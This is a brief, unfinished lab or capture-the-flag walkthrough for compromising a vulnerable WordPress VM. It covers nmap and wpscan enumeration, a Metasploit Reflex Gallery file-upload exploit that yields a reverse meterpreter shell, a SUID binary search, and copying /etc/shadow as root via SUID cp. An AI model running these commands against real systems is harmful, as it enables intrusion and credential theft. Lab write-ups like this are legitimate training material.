- As always, nmap scan reveals only TCP/80 open with new apache install page displayed
- dirb (or gobuster) reveals subdirectory called wordpress. Easy!
- wpscan –url http://192.168.53.23/wordpress –enumerate p (Enumerate plugins to see if any are vulnerable.)
- Reflex Gallery 3.1.3 Arbitrary File Upload vulnerability http://wpvulndb.com/vulnerabilities/7867
- Open MSF with #msfconsole and select the exploit with msf6> use exploit/unix/webapp/wp_reflexgallery_file_upload
- Enter msf > show options and set RHOST as the target IP Address, also set LHOST (Your IP) and TARGETURI of http://192.168.53.23/wordpress so it attacks the right directory structure on the server.
- You’ll be dumped to a meterpreter prompt. Enter shell to see a seemingly unresponsive shell but it’s there. Enter shell to proceed:
meterpreter > shell
Process 31924 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Sweet! We’re in the door!
8. We’re just www-data so we’ll need to escalate privileges.
9. Many exploits occur because of SUID binaries so we’ll start there. Enter find / -perm -u=s -type f 2>/dev/null to reveal 79 (!!) SUID binaries.
Recall that these can run as root so we can use those privileges to do dirty things to get root. Awesome.
10. First things, get the first flag with cat /home/raj/local.txt
11. Two key binaries are set with SUID bits, cp and wget, which is a critical vulnerability because you can move sensitive files around as root, replacing files to change security parameters. We’ll do that.
12. cp /etc/shadow /home/raj/shadow. That should get you started for a bit.
More to follow. Dinner time!